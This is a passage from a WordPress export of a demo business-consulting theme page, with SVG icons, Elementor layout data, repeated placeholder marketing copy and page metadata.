5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>	        
				<h5><a href="#">Natural Resources</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
			<h6>how we help</h6>		
			<h3>Align Costs with Strategy & Focus on Growth</h3>		
			<a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">get in touch</a>
			<h4>How It Works & How We Do It</h4>		
		<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.</p><p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
	        <h6>CORPORATE MANAGEMENT</h6>			
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>		
			<h4>Business Planning & Strategy</h4>		
				In what areas do you provide management consulting? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>				
				In which countries do you provide consulting services? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>				
				How is a consulting project started and organized? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>977</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:25:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:25:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consulting]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2c774f8","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6bc8536","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"ed430ae","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"017708c","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"f67d26f","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"977088c","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9348f7e","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"786190f","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"343704f","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#55BB53","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"a0bb326","elType":"widget","settings":{"title":"Brochures","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"f12bdfe","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1396f28","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"4fa4a55","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9af4798","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"d4ee160","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"60ffced","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home4.jpg","id":2076},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"904e2fa","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"3c3d54a","elType":"widget","settings":{"title":"Strategic & Tactical Planning","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"dec0c01","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"e91e771","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"122c65b","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"7bddef1","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"522b33e","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e34cba3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"8022263","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"8ba35e7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/energy.svg","id":980},"library":"svg"},"title":"Natural Resources","des":"We help financial institutions, from banking and insurance to wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"ce7cc23","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail3.jpg","id":982},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"padding":{"unit":"px","top":"70","right":"0","bottom":"70","left":"100","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"30","isLinked":false}},"elements":[{"id":"e61a616","elType":"column","settings":{"_column_size":50,"_inline_size":45.695999999999997953636921010911464691162109375,"_inline_size_tablet":80},"elements":[{"id":"4c16558","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"bold","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"65dee06","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"7ab0f67","elType":"widget","settings":{"btn_style":"light","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/blog\/","is_external":"","nofollow":"","custom_attributes":""},"button_text_color":"#FFFFFF"},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"abd3090","elType":"column","settings":{"_column_size":50,"_inline_size":54.304000000000002046363078989088535308837890625},"elements":[],"isInner":true}],"isInner":true},{"id":"29089d9","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e0d31db","elType":"column","settings":{"_column_size":50,"_inline_size":46,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"c0c4b49","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"typography_typography":"custom","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"1507a17","elType":"widget","settings":{"editor":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6bfd814","elType":"column","settings":{"_column_size":50,"_inline_size":54},"elements":[{"id":"ad31a08","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"2ef81ea","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"d8149bc","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"97cbbb6","elType":"widget","settings":{"title":"CORPORATE MANAGEMENT","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"206ff31","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"187c777","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"15a4ea5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ec27098","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8eca34c","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"75ae542"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"a85daa6"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"8e79519"}]},"elements":[],"widgetType":"iaccordions"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:11:{s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:5;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:21:"typography_typography";i:4;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:4;s:11:"title_color";i:2;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:25:"typography_text_transform";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:13;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:13;s:19:"_inline_size_mobile";i:4;s:19:"_inline_size_tablet";i:3;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:3;s:6:"margin";i:2;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:4:{s:7:"padding";i:5;s:14:"padding_mobile";i:4;s:6:"margin";i:2;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1